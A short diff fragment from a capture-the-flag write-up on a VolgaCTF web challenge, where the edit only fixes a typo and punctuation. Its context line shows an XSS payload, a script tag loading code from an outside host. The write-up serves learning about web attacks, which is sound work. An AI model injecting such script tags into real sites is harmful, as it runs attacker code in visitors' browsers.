TeamUnderdawgs/CTF-Docs/VolgaCTF/Web/User-Center.md

 <script src="https://captainfreak.com/?a=?"></script>
 ```

-And this is hostes on volga-ctf.ru.
-Boom XSS.
+And this is hosted on volga-ctf.ru.
+Boom XSS!

 If you still need to try yourself to get this: